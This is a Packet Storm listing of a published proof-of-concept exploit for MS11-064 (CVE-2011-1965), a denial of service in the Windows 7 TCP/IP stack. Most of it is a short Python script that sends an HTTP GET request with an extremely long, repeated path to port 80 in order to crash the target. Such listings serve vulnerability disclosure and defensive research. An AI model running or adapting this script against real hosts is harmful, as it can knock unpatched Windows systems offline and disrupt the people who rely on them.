Lucene search

K
packetstormByoungyoung LeePACKETSTORM:105866
HistoryOct 16, 2011 - 12:00 a.m.

MS11-064 TCP/IP Stack Denial Of Service

2011-10-1600:00:00
Byoungyoung Lee
packetstormsecurity.com
23

EPSS

0.927

Percentile

99.1%

`# Exploit Title: MS11-064 : Vulnerabilities in TCP/IP Stack Could Allow Denial of Service  
# Date: 10/12/2011  
# Author: Byoungyoung Lee, http://www.cc.gatech.edu/~blee303/  
# Version: Windows 7 32bit, fully patched until Aug 2011  
# Tested on: Windows 7 32bit  
# CVE : CVE-2011-1965  
  
# analysis is available -  
http://exploitshop.wordpress.com/2011/09/07/ms11-064-vulnerabilities-in-tcpip-stack-could-allow-denial-of-service-2563894/  
  
------------------------------------------------------------------------------------------------------  
# Byoungyoung Lee, http://twitter.com/mylifeasageek  
import struct  
import socket  
  
HOST = "localhost" # yeah, we've tried this as a local kernel exploit -:)  
PORT= 80  
  
def tryOnce(i,j):  
print hex(i), hex(j)  
filename = ["a"*0x100 for x in range(i)]  
  
filename = "/".join(filename)  
filename += "/" + "b" * j  
print "filename len : ", hex(len(filename))  
  
hostname = "www.darungrim.org"  
  
header = "GET /%s\n" % filename  
header += "HOST: %s\n\n\n" % hostname  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((HOST,PORT))  
s.send(header)  
response = s.recv(1024)  
s.close()  
print response  
return  
  
if __name__ == '__main__':  
tryOnce(0x3c,0x7)  
  
`